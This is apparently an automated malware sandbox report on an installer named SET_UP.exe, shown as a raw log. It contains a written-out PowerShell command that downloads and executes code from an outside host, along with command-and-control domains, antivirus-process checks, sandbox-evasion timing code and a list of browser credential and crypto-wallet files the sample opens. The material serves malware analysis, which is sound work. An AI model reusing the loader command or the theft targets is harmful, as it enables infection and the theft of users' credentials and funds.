            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wsock32.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: iconcodecservice.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: twinui.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: powrprof.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: pdh.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: umpdc.dll
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: SET_UP.exeStatic file information: File size 76245722 > 1048576
            Source: SET_UP.exeStatic PE information: section name: RT_CURSOR
            Source: SET_UP.exeStatic PE information: section name: RT_BITMAP
            Source: SET_UP.exeStatic PE information: section name: RT_ICON
            Source: SET_UP.exeStatic PE information: section name: RT_MENU
            Source: SET_UP.exeStatic PE information: section name: RT_DIALOG
            Source: SET_UP.exeStatic PE information: section name: RT_STRING
            Source: SET_UP.exeStatic PE information: section name: RT_ACCELERATOR
            Source: SET_UP.exeStatic PE information: section name: RT_GROUP_ICON

            Data Obfuscation

            Source: C:\Users\user\Desktop\SET_UP.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004B518C GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_004B518C
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe.0.dr Static PE information: real checksum: 0x9307ce should be: 0x8615ed
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe.0.dr Static PE information: section name: .didata
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.dr Static PE information: section name: .didata
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.dr Static PE information: section name: .didata
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe File created: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp File created: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp File created: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp File created: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp File created: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dll
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe File created: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
            Source: C:\Users\user\Desktop\SET_UP.exe File created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-FCQ2K.tmp
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004AC4C0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_004AC4C0
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004ACC70 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_004ACC70
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_00495BF2 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00495BF2
            Source: C:\Users\user\Desktop\SET_UP.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SET_UP.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\SET_UP.exe System information queried: FirmwareTableInformation
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe API/Special instruction interceptor: Address: 6BB37C44
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BB3F3E1 second address: 6BB3F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BB3F3FD second address: 6BB3F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F9A40AEBBE5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F9A40AEBC70h 0x00000031 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3066
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe API coverage: 2.5 %
            Source: C:\Users\user\Desktop\SET_UP.exe TID: 7624 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 3066 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep count: 235 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\Desktop\SET_UP.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_00498514 FindFirstFileW,GetDriveTypeW,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,0_2_00498514
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004B8FD2 FindFirstFileW,FindClose,0_2_004B8FD2
            Source: SET_UP.exe, 00000000.00000003.2020979262.0000000000787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0k|%SystemRoot%\system32\mswsock.dll\
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SET_UP.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004B518C GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_004B518C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004A16C4 SetUnhandledExceptionFilter,0_2_004A16C4
            Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_004A16D6 SetUnhandledExceptionFilter,0_2_004A16D6

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | NtQuerySystemInformation: Direct from: 0x4585B0
Source: SET_UP.exe | String found in binary or memory: rabidcowse.shop
Source: SET_UP.exe | String found in binary or memory: cloudewahsj.shop
Source: SET_UP.exe | String found in binary or memory: tirepublicerj.shop
Source: SET_UP.exe | String found in binary or memory: noisycuttej.shop
Source: SET_UP.exe | String found in binary or memory: cutefingeuker.click
Source: SET_UP.exe | String found in binary or memory: wholersorie.shop
Source: SET_UP.exe | String found in binary or memory: framekgirus.shop
Source: SET_UP.exe | String found in binary or memory: nearycrepso.shop
Source: SET_UP.exe | String found in binary or memory: abruptyopsn.shop
Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; q{
Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; q{
Source: C:\Users\user\Desktop\SET_UP.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\19e52a1d VolumeInformation
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | Code function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,36_2_00491486
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A535D GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_004A535D
Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004C5FE3 GetVersion,GetProcessVersion,LoadCursorW,LoadCursorW,LoadCursorW,0_2_004C5FE3
Source: C:\Users\user\Desktop\SET_UP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: SET_UP.exe, 00000000.00000003.1959008841.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929935642.0000000003719000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2023039150.0000000003718000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7480, type: MEMORYSTR
Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: SET_UP.exe, 00000000.00000003.1909262053.0000000000815000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: SET_UP.exe, 00000000.00000002.2021617890.000000000075E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\Wh
Source: SET_UP.exe, 00000000.00000003.1909606983.0000000000810000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
Source: SET_UP.exe, 00000000.00000002.2021617890.000000000075E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: SET_UP.exe | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SET_UP.exe, 00000000.00000003.1909606983.0000000000810000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
